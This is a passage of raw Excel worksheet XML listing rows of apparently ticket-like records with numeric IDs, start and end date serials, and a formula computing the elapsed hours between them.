        <v>2245</v>
      </c>
      <c r="D662" t="s">
        <v>7</v>
      </c>
      <c r="E662" s="1">
        <v>43536.240856481483</v>
      </c>
      <c r="F662" s="1">
        <v>43537.178599537037</v>
      </c>
      <c r="G662" t="s">
        <v>1205</v>
      </c>
      <c r="H662" t="str">
        <f>TEXT(F662-E662,"[h]")</f>
        <v>22</v>
      </c>
    </row>
    <row r="663" spans="1:8" hidden="1">
      <c r="A663" t="s">
        <v>2246</v>
      </c>
      <c r="B663">
        <v>13104</v>
      </c>
      <c r="C663" t="s">
        <v>2247</v>
      </c>
      <c r="D663" t="s">
        <v>7</v>
      </c>
      <c r="E663" s="1">
        <v>43534.543067129627</v>
      </c>
      <c r="F663" s="1">
        <v>43537.895451388889</v>
      </c>
      <c r="G663" t="s">
        <v>115</v>
      </c>
      <c r="H663" t="str">
        <f>TEXT(F663-E663,"[h]")</f>
        <v>80</v>
      </c>
    </row>
    <row r="664" spans="1:8" hidden="1">
      <c r="A664" t="s">
        <v>2248</v>
      </c>
      <c r="B664">
        <v>13099</v>
      </c>
      <c r="C664" t="s">
        <v>2249</v>
      </c>
      <c r="D664" t="s">
        <v>7</v>
      </c>
      <c r="E664" s="1">
        <v>43530.401597222219</v>
      </c>
      <c r="F664" s="1">
        <v>43543.329409722224</v>
      </c>
      <c r="G664" t="s">
        <v>51</v>
      </c>
      <c r="H664" t="str">
        <f>TEXT(F664-E664,"[h]")</f>
        <v>310</v>
      </c>
    </row>
    <row r="665" spans="1:8" hidden="1">
      <c r="A665" t="s">
        <v>2250</v>
      </c>
      <c r="B665">
        <v>13097</v>
      </c>
      <c r="C665" t="s">
        <v>2251</v>
      </c>
      <c r="D665" t="s">
        <v>7</v>
      </c>
      <c r="E665" s="1">
        <v>43529.47997685185</v>
      </c>
      <c r="F665" s="1">
        <v>43530.394328703704</v>
      </c>
      <c r="G665" t="s">
        <v>255</v>
      </c>
      <c r="H665" t="str">
        <f>TEXT(F665-E665,"[h]")</f>
        <v>21</v>
      </c>
    </row>
    <row r="666" spans="1:8" hidden="1">
      <c r="A666" t="s">
        <v>2252</v>
      </c>
      <c r="B666">
        <v>13096</v>
      </c>
      <c r="C666" t="s">
        <v>2253</v>
      </c>
      <c r="D666" t="s">
        <v>7</v>
      </c>
      <c r="E666" s="1">
        <v>43529.421134259261</v>
      </c>
      <c r="F666" s="1">
        <v>43530.717939814815</v>
      </c>
      <c r="G666" t="s">
        <v>2254</v>
      </c>
      <c r="H666" t="str">
        <f>TEXT(F666-E666,"[h]")</f>
        <v>31</v>
      </c>
    </row>
    <row r="667" spans="1:8">
      <c r="A667" t="s">
        <v>2188</v>
      </c>
      <c r="B667">
        <v>13095</v>
      </c>
      <c r="C667" t="s">
        <v>2189</v>
      </c>
      <c r="D667" t="s">
        <v>7</v>
      </c>
      <c r="E667" s="1">
        <v>43529.40729166667</v>
      </c>
      <c r="F667" s="1">
        <v>43530.407430555555</v>
      </c>
      <c r="G667" t="s">
        <v>2190</v>
      </c>
      <c r="H667" t="str">
        <f>TEXT(F667-E667,"[h]")</f>
        <v>24</v>
      </c>
    </row>
    <row r="668" spans="1:8" hidden="1">
      <c r="A668" t="s">
        <v>2255</v>
      </c>
      <c r="B668">
        <v>13094</v>
      </c>
      <c r="C668" t="s">
        <v>2256</v>
      </c>
      <c r="D668" t="s">
        <v>7</v>
      </c>
      <c r="E668" s="1">
        <v>43529.280821759261</v>
      </c>
      <c r="F668" s="1">
        <v>43530.394328703704</v>
      </c>
      <c r="G668" t="s">
        <v>66</v>
      </c>
      <c r="H668" t="str">
        <f>TEXT(F668-E668,"[h]")</f>
        <v>26</v>
      </c>
    </row>
    <row r="669" spans="1:8">
      <c r="A669" t="s">
        <v>2257</v>
      </c>
      <c r="B669">
        <v>13093</v>
      </c>
      <c r="C669" t="s">
        <v>2258</v>
      </c>
      <c r="D669" t="s">
        <v>7</v>
      </c>
      <c r="E669" s="1">
        <v>43529.217581018522</v>
      </c>
      <c r="F669" s="1">
        <v>43530.261921296296</v>
      </c>
      <c r="G669" t="s">
        <v>2259</v>
      </c>
      <c r="H669" t="str">
        <f>TEXT(F669-E669,"[h]")</f>
        <v>25</v>
      </c>
    </row>
    <row r="670" spans="1:8">
      <c r="A670" t="s">
        <v>2260</v>
      </c>
      <c r="B670">
        <v>13092</v>
      </c>
      <c r="C670" t="s">
        <v>2261</v>
      </c>
      <c r="D670" t="s">
        <v>7</v>
      </c>
      <c r="E670" s="1">
        <v>43528.936527777776</v>
      </c>
      <c r="F670" s="1">
        <v>43534.419571759259</v>
      </c>
      <c r="G670" t="s">
        <v>16</v>
      </c>
      <c r="H670" t="str">
        <f>TEXT(F670-E670,"[h]")</f>
        <v>131</v>
      </c>
    </row>
    <row r="671" spans="1:8" hidden="1">
      <c r="A671" t="s">
        <v>2265</v>
      </c>
      <c r="B671">
        <v>13090</v>
      </c>
      <c r="C671" t="s">
        <v>2266</v>
      </c>
      <c r="D671" t="s">
        <v>7</v>
      </c>
      <c r="E671" s="1">
        <v>43528.564039351855</v>
      </c>
      <c r="F671" s="1">
        <v>43528.742951388886</v>
      </c>
      <c r="G671" t="s">
        <v>1520</v>
      </c>
      <c r="H671" t="str">
        <f>TEXT(F671-E671,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="672" spans="1:8">
      <c r="A672" t="s">
        <v>2267</v>
      </c>
      <c r="B672">
        <v>13087</v>
      </c>
      <c r="C672" t="s">
        <v>2268</v>
      </c>
      <c r="D672" t="s">
        <v>7</v>
      </c>
      <c r="E672" s="1">
        <v>43528.334699074076</v>
      </c>
      <c r="F672" s="1">
        <v>43530.261921296296</v>
      </c>
      <c r="G672" t="s">
        <v>189</v>
      </c>
      <c r="H672" t="str">
        <f>TEXT(F672-E672,"[h]")</f>
        <v>46</v>
      </c>
    </row>
    <row r="673" spans="1:8">
      <c r="A673" t="s">
        <v>2269</v>
      </c>
      <c r="B673">
        <v>13086</v>
      </c>
      <c r="C673" t="s">
        <v>2270</v>
      </c>
      <c r="D673" t="s">
        <v>7</v>
      </c>
      <c r="E673" s="1">
        <v>43528.069548611114</v>
      </c>
      <c r="F673" s="1">
        <v>43530.395300925928</v>
      </c>
      <c r="G673" t="s">
        <v>2271</v>
      </c>
      <c r="H673" t="str">
        <f>TEXT(F673-E673,"[h]")</f>
        <v>55</v>
      </c>
    </row>
    <row r="674" spans="1:8" hidden="1">
      <c r="A674" t="s">
        <v>2280</v>
      </c>
      <c r="B674">
        <v>13079</v>
      </c>
      <c r="C674" t="s">
        <v>2281</v>
      </c>
      <c r="D674" t="s">
        <v>7</v>
      </c>
      <c r="E674" s="1">
        <v>43527.149710648147</v>
      </c>
      <c r="F674" s="1">
        <v>43535.864479166667</v>
      </c>
      <c r="G674" t="s">
        <v>1205</v>
      </c>
      <c r="H674" t="str">
        <f>TEXT(F674-E674,"[h]")</f>
        <v>209</v>
      </c>
    </row>
    <row r="675" spans="1:8" hidden="1">
      <c r="A675" t="s">
        <v>2282</v>
      </c>
      <c r="B675">
        <v>13078</v>
      </c>
      <c r="C675" t="s">
        <v>2283</v>
      </c>
      <c r="D675" t="s">
        <v>7</v>
      </c>
      <c r="E675" s="1">
        <v>43527.005925925929</v>
      </c>
      <c r="F675" s="1">
        <v>43537.088645833333</v>
      </c>
      <c r="G675" t="s">
        <v>1205</v>
      </c>
      <c r="H675" t="str">
        <f>TEXT(F675-E675,"[h]")</f>
        <v>241</v>
      </c>
    </row>
    <row r="676" spans="1:8">
      <c r="A676" t="s">
        <v>2278</v>
      </c>
      <c r="B676">
        <v>13077</v>
      </c>
      <c r="C676" t="s">
        <v>2279</v>
      </c>
      <c r="D676" t="s">
        <v>7</v>
      </c>
      <c r="E676" s="1">
        <v>43526.9371875</v>
      </c>
      <c r="F676" s="1">
        <v>43527.694178240738</v>
      </c>
      <c r="G676" t="s">
        <v>31</v>
      </c>
      <c r="H676" t="str">
        <f>TEXT(F676-E676,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="677" spans="1:8">
      <c r="A677" t="s">
        <v>2262</v>
      </c>
      <c r="B677">
        <v>13076</v>
      </c>
      <c r="C677" t="s">
        <v>2263</v>
      </c>
      <c r="D677" t="s">
        <v>7</v>
      </c>
      <c r="E677" s="1">
        <v>43526.868611111109</v>
      </c>
      <c r="F677" s="1">
        <v>43527.688483796293</v>
      </c>
      <c r="G677" t="s">
        <v>2264</v>
      </c>
      <c r="H677" t="str">
        <f>TEXT(F677-E677,"[h]")</f>
        <v>19</v>
      </c>
    </row>
    <row r="678" spans="1:8">
      <c r="A678" t="s">
        <v>2276</v>
      </c>
      <c r="B678">
        <v>13075</v>
      </c>
      <c r="C678" t="s">
        <v>2277</v>
      </c>
      <c r="D678" t="s">
        <v>7</v>
      </c>
      <c r="E678" s="1">
        <v>43526.866099537037</v>
      </c>
      <c r="F678" s="1">
        <v>43527.975405092591</v>
      </c>
      <c r="G678" t="s">
        <v>2264</v>
      </c>
      <c r="H678" t="str">
        <f>TEXT(F678-E678,"[h]")</f>
        <v>26</v>
      </c>
    </row>
    <row r="679" spans="1:8">
      <c r="A679" t="s">
        <v>2284</v>
      </c>
      <c r="B679">
        <v>13074</v>
      </c>
      <c r="C679" t="s">
        <v>2285</v>
      </c>
      <c r="D679" t="s">
        <v>7</v>
      </c>
      <c r="E679" s="1">
        <v>43526.847627314812</v>
      </c>
      <c r="F679" s="1">
        <v>43527.975405092591</v>
      </c>
      <c r="G679" t="s">
        <v>2264</v>
      </c>
      <c r="H679" t="str">
        <f>TEXT(F679-E679,"[h]")</f>
        <v>27</v>
      </c>
    </row>
    <row r="680" spans="1:8" hidden="1">
      <c r="A680" t="s">
        <v>2286</v>
      </c>
      <c r="B680">
        <v>13073</v>
      </c>
      <c r="C680" t="s">
        <v>2287</v>
      </c>
      <c r="D680" t="s">
        <v>7</v>
      </c>
      <c r="E680" s="1">
        <v>43526.831041666665</v>
      </c>
      <c r="F680" s="1">
        <v>43526.910127314812</v>
      </c>
      <c r="G680" t="s">
        <v>1205</v>
      </c>
      <c r="H680" t="str">
        <f>TEXT(F680-E680,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="681" spans="1:8">
      <c r="A681" t="s">
        <v>2288</v>
      </c>
      <c r="B681">
        <v>13072</v>
      </c>
      <c r="C681" t="s">
        <v>2289</v>
      </c>
      <c r="D681" t="s">
        <v>7</v>
      </c>
      <c r="E681" s="1">
        <v>43526.618946759256</v>
      </c>
      <c r="F681" s="1">
        <v>43526.69189814815</v>
      </c>
      <c r="G681" t="s">
        <v>1666</v>
      </c>
      <c r="H681" t="str">
        <f>TEXT(F681-E681,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="682" spans="1:8" hidden="1">
      <c r="A682" t="s">
        <v>2290</v>
      </c>
      <c r="B682">
        <v>13071</v>
      </c>
      <c r="C682" t="s">
        <v>2291</v>
      </c>
      <c r="D682" t="s">
        <v>7</v>
      </c>
      <c r="E682" s="1">
        <v>43526.553414351853</v>
      </c>
      <c r="F682" s="1">
        <v>43527.404479166667</v>
      </c>
      <c r="G682" t="s">
        <v>255</v>
      </c>
      <c r="H682" t="str">
        <f>TEXT(F682-E682,"[h]")</f>
        <v>20</v>
      </c>
    </row>
    <row r="683" spans="1:8">
      <c r="A683" t="s">
        <v>2272</v>
      </c>
      <c r="B683">
        <v>13068</v>
      </c>
      <c r="C683" t="s">
        <v>2273</v>
      </c>
      <c r="D683" t="s">
        <v>7</v>
      </c>
      <c r="E683" s="1">
        <v>43526.249976851854</v>
      </c>
      <c r="F683" s="1">
        <v>43528.063726851855</v>
      </c>
      <c r="G683" t="s">
        <v>16</v>
      </c>
      <c r="H683" t="str">
        <f>TEXT(F683-E683,"[h]")</f>
        <v>43</v>
      </c>
    </row>
    <row r="684" spans="1:8" hidden="1">
      <c r="A684" t="s">
        <v>2292</v>
      </c>
      <c r="B684">
        <v>13067</v>
      </c>
      <c r="C684" t="s">
        <v>2293</v>
      </c>
      <c r="D684" t="s">
        <v>7</v>
      </c>
      <c r="E684" s="1">
        <v>43526.192418981482</v>
      </c>
      <c r="F684" s="1">
        <v>43526.702152777776</v>
      </c>
      <c r="G684" t="s">
        <v>1302</v>
      </c>
      <c r="H684" t="str">
        <f>TEXT(F684-E684,"[h]")</f>
        <v>12</v>
      </c>
    </row>
    <row r="685" spans="1:8" hidden="1">
      <c r="A685" t="s">
        <v>2294</v>
      </c>
      <c r="B685">
        <v>13064</v>
      </c>
      <c r="C685" t="s">
        <v>2295</v>
      </c>
      <c r="D685" t="s">
        <v>7</v>
      </c>
      <c r="E685" s="1">
        <v>43525.316782407404</v>
      </c>
      <c r="F685" s="1">
        <v>43537.847488425927</v>
      </c>
      <c r="G685" t="s">
        <v>1520</v>
      </c>
      <c r="H685" t="str">
        <f>TEXT(F685-E685,"[h]")</f>
        <v>300</v>
      </c>
    </row>
    <row r="686" spans="1:8" hidden="1">
      <c r="A686" t="s">
        <v>2296</v>
      </c>
      <c r="B686">
        <v>13063</v>
      </c>
      <c r="C686" t="s">
        <v>2297</v>
      </c>
      <c r="D686" t="s">
        <v>7</v>
      </c>
      <c r="E686" s="1">
        <v>43525.302847222221</v>
      </c>
      <c r="F686" s="1">
        <v>43525.83357638889</v>
      </c>
      <c r="G686" t="s">
        <v>1520</v>
      </c>
      <c r="H686" t="str">
        <f>TEXT(F686-E686,"[h]")</f>
        <v>12</v>
      </c>
    </row>
    <row r="687" spans="1:8">
      <c r="A687" t="s">
        <v>2298</v>
      </c>
      <c r="B687">
        <v>13062</v>
      </c>
      <c r="C687" t="s">
        <v>2299</v>
      </c>
      <c r="D687" t="s">
        <v>7</v>
      </c>
      <c r="E687" s="1">
        <v>43525.293020833335</v>
      </c>
      <c r="F687" s="1">
        <v>43528.163240740738</v>
      </c>
      <c r="G687" t="s">
        <v>849</v>
      </c>
      <c r="H687" t="str">
        <f>TEXT(F687-E687,"[h]")</f>
        <v>68</v>
      </c>
    </row>
    <row r="688" spans="1:8">
      <c r="A688" t="s">
        <v>2300</v>
      </c>
      <c r="B688">
        <v>13060</v>
      </c>
      <c r="C688" t="s">
        <v>2301</v>
      </c>
      <c r="D688" t="s">
        <v>7</v>
      </c>
      <c r="E688" s="1">
        <v>43524.899976851855</v>
      </c>
      <c r="F688" s="1">
        <v>43566.044722222221</v>
      </c>
      <c r="G688" t="s">
        <v>160</v>
      </c>
      <c r="H688" t="str">
        <f>TEXT(F688-E688,"[h]")</f>
        <v>987</v>
      </c>
    </row>
    <row r="689" spans="1:8" hidden="1">
      <c r="A689" t="s">
        <v>2302</v>
      </c>
      <c r="B689">
        <v>13058</v>
      </c>
      <c r="C689" t="s">
        <v>2303</v>
      </c>
      <c r="D689" t="s">
        <v>7</v>
      </c>
      <c r="E689" s="1">
        <v>43524.772083333337</v>
      </c>
      <c r="F689" s="1">
        <v>43525.22078703704</v>
      </c>
      <c r="G689" t="s">
        <v>66</v>
      </c>
      <c r="H689" t="str">
        <f>TEXT(F689-E689,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="690" spans="1:8">
      <c r="A690" t="s">
        <v>2304</v>
      </c>
      <c r="B690">
        <v>13056</v>
      </c>
      <c r="C690" t="s">
        <v>2305</v>
      </c>
      <c r="D690" t="s">
        <v>7</v>
      </c>
      <c r="E690" s="1">
        <v>43524.360185185185</v>
      </c>
      <c r="F690" s="1">
        <v>43525.812662037039</v>
      </c>
      <c r="G690" t="s">
        <v>126</v>
      </c>
      <c r="H690" t="str">
        <f>TEXT(F690-E690,"[h]")</f>
        <v>34</v>
      </c>
    </row>
    <row r="691" spans="1:8" hidden="1">
      <c r="A691" t="s">
        <v>2306</v>
      </c>
      <c r="B691">
        <v>13055</v>
      </c>
      <c r="C691" t="s">
        <v>2307</v>
      </c>
      <c r="D691" t="s">
        <v>7</v>
      </c>
      <c r="E691" s="1">
        <v>43523.919733796298</v>
      </c>
      <c r="F691" s="1">
        <v>43524.010949074072</v>
      </c>
      <c r="G691" t="s">
        <v>66</v>
      </c>
      <c r="H691" t="str">
        <f>TEXT(F691-E691,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="692" spans="1:8" hidden="1">
      <c r="A692" t="s">
        <v>2308</v>
      </c>
      <c r="B692">
        <v>13052</v>
      </c>
      <c r="C692" t="s">
        <v>2309</v>
      </c>
      <c r="D692" t="s">
        <v>7</v>
      </c>
      <c r="E692" s="1">
        <v>43523.521087962959</v>
      </c>
      <c r="F692" s="1">
        <v>43525.2737037037</v>
      </c>
      <c r="G692" t="s">
        <v>2310</v>
      </c>
      <c r="H692" t="str">
        <f>TEXT(F692-E692,"[h]")</f>
        <v>42</v>
      </c>
    </row>
    <row r="693" spans="1:8" hidden="1">
      <c r="A693" t="s">
        <v>2311</v>
      </c>
      <c r="B693">
        <v>13050</v>
      </c>
      <c r="C693" t="s">
        <v>2312</v>
      </c>
      <c r="D693" t="s">
        <v>7</v>
      </c>
      <c r="E693" s="1">
        <v>43523.263807870368</v>
      </c>
      <c r="F693" s="1">
        <v>43524.043958333335</v>
      </c>
      <c r="G693" t="s">
        <v>174</v>
      </c>
      <c r="H693" t="str">
        <f>TEXT(F693-E693,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="694" spans="1:8" hidden="1">
      <c r="A694" t="s">
        <v>2313</v>
      </c>
      <c r="B694">
        <v>13049</v>
      </c>
      <c r="C694" t="s">
        <v>2314</v>
      </c>
      <c r="D694" t="s">
        <v>7</v>
      </c>
      <c r="E694" s="1">
        <v>43522.978692129633</v>
      </c>
      <c r="F694" s="1">
        <v>43528.904930555553</v>
      </c>
      <c r="G694" t="s">
        <v>28</v>
      </c>
      <c r="H694" t="str">
        <f>TEXT(F694-E694,"[h]")</f>
        <v>142</v>
      </c>
    </row>
    <row r="695" spans="1:8" hidden="1">
      <c r="A695" t="s">
        <v>2315</v>
      </c>
      <c r="B695">
        <v>13048</v>
      </c>
      <c r="C695" t="s">
        <v>2316</v>
      </c>
      <c r="D695" t="s">
        <v>7</v>
      </c>
      <c r="E695" s="1">
        <v>43522.942824074074</v>
      </c>
      <c r="F695" s="1">
        <v>43712.863877314812</v>
      </c>
      <c r="G695" t="s">
        <v>2317</v>
      </c>
      <c r="H695" t="str">
        <f>TEXT(F695-E695,"[h]")</f>
        <v>4558</v>
      </c>
    </row>
    <row r="696" spans="1:8" hidden="1">
      <c r="A696" t="s">
        <v>2318</v>
      </c>
      <c r="B696">
        <v>13046</v>
      </c>
      <c r="C696" t="s">
        <v>2319</v>
      </c>
      <c r="D696" t="s">
        <v>7</v>
      </c>
      <c r="E696" s="1">
        <v>43522.625358796293</v>
      </c>
      <c r="F696" s="1">
        <v>43580.651944444442</v>
      </c>
      <c r="G696" t="s">
        <v>37</v>
      </c>
      <c r="H696" t="str">
        <f>TEXT(F696-E696,"[h]")</f>
        <v>1392</v>
      </c>
    </row>
    <row r="697" spans="1:8" hidden="1">
      <c r="A697" t="s">
        <v>2320</v>
      </c>
      <c r="B697">
        <v>13045</v>
      </c>
      <c r="C697" t="s">
        <v>2321</v>
      </c>
      <c r="D697" t="s">
        <v>7</v>
      </c>
      <c r="E697" s="1">
        <v>43522.621562499997</v>
      </c>
      <c r="F697" s="1">
        <v>43522.675706018519</v>
      </c>
      <c r="G697" t="s">
        <v>1103</v>
      </c>
      <c r="H697" t="str">
        <f>TEXT(F697-E697,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="698" spans="1:8" hidden="1">
      <c r="A698" t="s">
        <v>2322</v>
      </c>
      <c r="B698">
        <v>13044</v>
      </c>
      <c r="C698" t="s">
        <v>2323</v>
      </c>
      <c r="D698" t="s">
        <v>7</v>
      </c>
      <c r="E698" s="1">
        <v>43522.555428240739</v>
      </c>
      <c r="F698" s="1">
        <v>43522.676874999997</v>
      </c>
      <c r="G698" t="s">
        <v>66</v>
      </c>
      <c r="H698" t="str">
        <f>TEXT(F698-E698,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="699" spans="1:8" hidden="1">
      <c r="A699" t="s">
        <v>2324</v>
      </c>
      <c r="B699">
        <v>13043</v>
      </c>
      <c r="C699" t="s">
        <v>2325</v>
      </c>
      <c r="D699" t="s">
        <v>7</v>
      </c>
      <c r="E699" s="1">
        <v>43522.548900462964</v>
      </c>
      <c r="F699" s="1">
        <v>43580.883611111109</v>
      </c>
      <c r="G699" t="s">
        <v>461</v>
      </c>
      <c r="H699" t="str">
        <f>TEXT(F699-E699,"[h]")</f>
        <v>1400</v>
      </c>
    </row>
    <row r="700" spans="1:8" hidden="1">
      <c r="A700" t="s">
        <v>2329</v>
      </c>
      <c r="B700">
        <v>13040</v>
      </c>
      <c r="C700" t="s">
        <v>2330</v>
      </c>
      <c r="D700" t="s">
        <v>7</v>
      </c>
      <c r="E700" s="1">
        <v>43521.639722222222</v>
      </c>
      <c r="F700" s="1">
        <v>43582.013668981483</v>
      </c>
      <c r="G700" t="s">
        <v>174</v>
      </c>
      <c r="H700" t="str">
        <f>TEXT(F700-E700,"[h]")</f>
        <v>1448</v>
      </c>
    </row>
    <row r="701" spans="1:8">
      <c r="A701" t="s">
        <v>2274</v>
      </c>
      <c r="B701">
        <v>13039</v>
      </c>
      <c r="C701" t="s">
        <v>2275</v>
      </c>
      <c r="D701" t="s">
        <v>7</v>
      </c>
      <c r="E701" s="1">
        <v>43521.574270833335</v>
      </c>
      <c r="F701" s="1">
        <v>43522.578020833331</v>
      </c>
      <c r="G701" t="s">
        <v>1423</v>
      </c>
      <c r="H701" t="str">
        <f>TEXT(F701-E701,"[h]")</f>
        <v>24</v>
      </c>
    </row>
    <row r="702" spans="1:8" hidden="1">
      <c r="A702" t="s">
        <v>2333</v>
      </c>
      <c r="B702">
        <v>13037</v>
      </c>
      <c r="C702" t="s">
        <v>2334</v>
      </c>
      <c r="D702" t="s">
        <v>7</v>
      </c>
      <c r="E702" s="1">
        <v>43521.511446759258</v>
      </c>
      <c r="F702" s="1">
        <v>43521.765057870369</v>
      </c>
      <c r="G702" t="s">
        <v>2335</v>
      </c>
      <c r="H702" t="str">
        <f>TEXT(F702-E702,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="703" spans="1:8">
      <c r="A703" t="s">
        <v>2178</v>
      </c>
      <c r="B703">
        <v>13036</v>
      </c>
      <c r="C703" t="s">
        <v>2179</v>
      </c>
      <c r="D703" t="s">
        <v>7</v>
      </c>
      <c r="E703" s="1">
        <v>43521.263912037037</v>
      </c>
      <c r="F703" s="1">
        <v>43529.003993055558</v>
      </c>
      <c r="G703" t="s">
        <v>16</v>
      </c>
      <c r="H703" t="str">
        <f>TEXT(F703-E703,"[h]")</f>
        <v>185</v>
      </c>
    </row>
    <row r="704" spans="1:8" hidden="1">
      <c r="A704" t="s">
        <v>2336</v>
      </c>
      <c r="B704">
        <v>13035</v>
      </c>
      <c r="C704" t="s">
        <v>2337</v>
      </c>
      <c r="D704" t="s">
        <v>7</v>
      </c>
      <c r="E704" s="1">
        <v>43521.206956018519</v>
      </c>
      <c r="F704" s="1">
        <v>43524.347361111111</v>
      </c>
      <c r="G704" t="s">
        <v>204</v>
      </c>
      <c r="H704" t="str">
        <f>TEXT(F704-E704,"[h]")</f>
        <v>75</v>
      </c>
    </row>
    <row r="705" spans="1:8" hidden="1">
      <c r="A705" t="s">
        <v>2338</v>
      </c>
      <c r="B705">
        <v>13033</v>
      </c>
      <c r="C705" t="s">
        <v>2339</v>
      </c>
      <c r="D705" t="s">
        <v>7</v>
      </c>
      <c r="E705" s="1">
        <v>43521.106493055559</v>
      </c>
      <c r="F705" s="1">
        <v>43524.335335648146</v>
      </c>
      <c r="G705" t="s">
        <v>90</v>
      </c>
      <c r="H705" t="str">
        <f>TEXT(F705-E705,"[h]")</f>
        <v>77</v>
      </c>
    </row>
    <row r="706" spans="1:8" hidden="1">
      <c r="A706" t="s">
        <v>2340</v>
      </c>
      <c r="B706">
        <v>13032</v>
      </c>
      <c r="C706" t="s">
        <v>2341</v>
      </c>
      <c r="D706" t="s">
        <v>7</v>
      </c>
      <c r="E706" s="1">
        <v>43521.094884259262</v>
      </c>
      <c r="F706" s="1">
        <v>43521.902442129627</v>
      </c>
      <c r="G706" t="s">
        <v>883</v>
      </c>
      <c r="H706" t="str">
        <f>TEXT(F706-E706,"[h]")</f>
        <v>19</v>
      </c>
    </row>
    <row r="707" spans="1:8" hidden="1">
      <c r="A707" t="s">
        <v>2342</v>
      </c>
      <c r="B707">
        <v>13031</v>
      </c>
      <c r="C707" t="s">
        <v>2343</v>
      </c>
      <c r="D707" t="s">
        <v>7</v>
      </c>
      <c r="E707" s="1">
        <v>43521.083310185182</v>
      </c>
      <c r="F707" s="1">
        <v>43521.173217592594</v>
      </c>
      <c r="G707" t="s">
        <v>174</v>
      </c>
      <c r="H707" t="str">
        <f>TEXT(F707-E707,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="708" spans="1:8" hidden="1">
      <c r="A708" t="s">
        <v>2344</v>
      </c>
      <c r="B708">
        <v>13027</v>
      </c>
      <c r="C708" t="s">
        <v>2345</v>
      </c>
      <c r="D708" t="s">
        <v>7</v>
      </c>
      <c r="E708" s="1">
        <v>43520.833993055552</v>
      </c>
      <c r="F708" s="1">
        <v>43520.91070601852</v>
      </c>
      <c r="G708" t="s">
        <v>2346</v>
      </c>
      <c r="H708" t="str">
        <f>TEXT(F708-E708,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="709" spans="1:8">
      <c r="A709" t="s">
        <v>2347</v>
      </c>
      <c r="B709">
        <v>13026</v>
      </c>
      <c r="C709" t="s">
        <v>2348</v>
      </c>
      <c r="D709" t="s">
        <v>7</v>
      </c>
      <c r="E709" s="1">
        <v>43520.814363425925</v>
      </c>
      <c r="F709" s="1">
        <v>43520.909745370373</v>
      </c>
      <c r="G709" t="s">
        <v>1693</v>
      </c>
      <c r="H709" t="str">
        <f>TEXT(F709-E709,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="710" spans="1:8" hidden="1">
      <c r="A710" t="s">
        <v>2349</v>
      </c>
      <c r="B710">
        <v>13025</v>
      </c>
      <c r="C710" t="s">
        <v>2350</v>
      </c>
      <c r="D710" t="s">
        <v>7</v>
      </c>
      <c r="E710" s="1">
        <v>43520.385462962964</v>
      </c>
      <c r="F710" s="1">
        <v>43520.38652777778</v>
      </c>
      <c r="G710" t="s">
        <v>2351</v>
      </c>
      <c r="H710" t="str">
        <f>TEXT(F710-E710,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="711" spans="1:8" hidden="1">
      <c r="A711" t="s">
        <v>2352</v>
      </c>
      <c r="B711">
        <v>13024</v>
      </c>
      <c r="C711" t="s">
        <v>2353</v>
      </c>
      <c r="D711" t="s">
        <v>7</v>
      </c>
      <c r="E711" s="1">
        <v>43520.373564814814</v>
      </c>
      <c r="F711" s="1">
        <v>43527.647743055553</v>
      </c>
      <c r="G711" t="s">
        <v>2354</v>
      </c>
      <c r="H711" t="str">
        <f>TEXT(F711-E711,"[h]")</f>
        <v>174</v>
      </c>
    </row>
    <row r="712" spans="1:8">
      <c r="A712" t="s">
        <v>2355</v>
      </c>
      <c r="B712">
        <v>13023</v>
      </c>
      <c r="C712" t="s">
        <v>2356</v>
      </c>
      <c r="D712" t="s">
        <v>7</v>
      </c>
      <c r="E712" s="1">
        <v>43520.215937499997</v>
      </c>
      <c r="F712" s="1">
        <v>43520.81108796296</v>
      </c>
      <c r="G712" t="s">
        <v>2264</v>
      </c>
      <c r="H712" t="str">
        <f>TEXT(F712-E712,"[h]")</f>
        <v>14</v>
      </c>
    </row>
    <row r="713" spans="1:8">
      <c r="A713" t="s">
        <v>2357</v>
      </c>
      <c r="B713">
        <v>13020</v>
      </c>
      <c r="C713" t="s">
        <v>2358</v>
      </c>
      <c r="D713" t="s">
        <v>7</v>
      </c>
      <c r="E713" s="1">
        <v>43519.000752314816</v>
      </c>
      <c r="F713" s="1">
        <v>43519.062858796293</v>
      </c>
      <c r="G713" t="s">
        <v>98</v>
      </c>
      <c r="H713" t="str">
        <f>TEXT(F713-E713,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="714" spans="1:8" hidden="1">
      <c r="A714" t="s">
        <v>2326</v>
      </c>
      <c r="B714">
        <v>13019</v>
      </c>
      <c r="C714" t="s">
        <v>2327</v>
      </c>
      <c r="D714" t="s">
        <v>7</v>
      </c>
      <c r="E714" s="1">
        <v>43518.782060185185</v>
      </c>
      <c r="F714" s="1">
        <v>43522.016782407409</v>
      </c>
      <c r="G714" t="s">
        <v>2328</v>
      </c>
      <c r="H714" t="str">
        <f>TEXT(F714-E714,"[h]")</f>
        <v>77</v>
      </c>
    </row>
    <row r="715" spans="1:8" hidden="1">
      <c r="A715" t="s">
        <v>2359</v>
      </c>
      <c r="B715">
        <v>13018</v>
      </c>
      <c r="C715" t="s">
        <v>2360</v>
      </c>
      <c r="D715" t="s">
        <v>7</v>
      </c>
      <c r="E715" s="1">
        <v>43518.593645833331</v>
      </c>
      <c r="F715" s="1">
        <v>43518.6403587963</v>
      </c>
      <c r="G715" t="s">
        <v>304</v>
      </c>
      <c r="H715" t="str">
        <f>TEXT(F715-E715,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="716" spans="1:8" hidden="1">
      <c r="A716" t="s">
        <v>2361</v>
      </c>
      <c r="B716">
        <v>13017</v>
      </c>
      <c r="C716" t="s">
        <v>2362</v>
      </c>
      <c r="D716" t="s">
        <v>7</v>
      </c>
      <c r="E716" s="1">
        <v>43518.578715277778</v>
      </c>
      <c r="F716" s="1">
        <v>43530.507118055553</v>
      </c>
      <c r="G716" t="s">
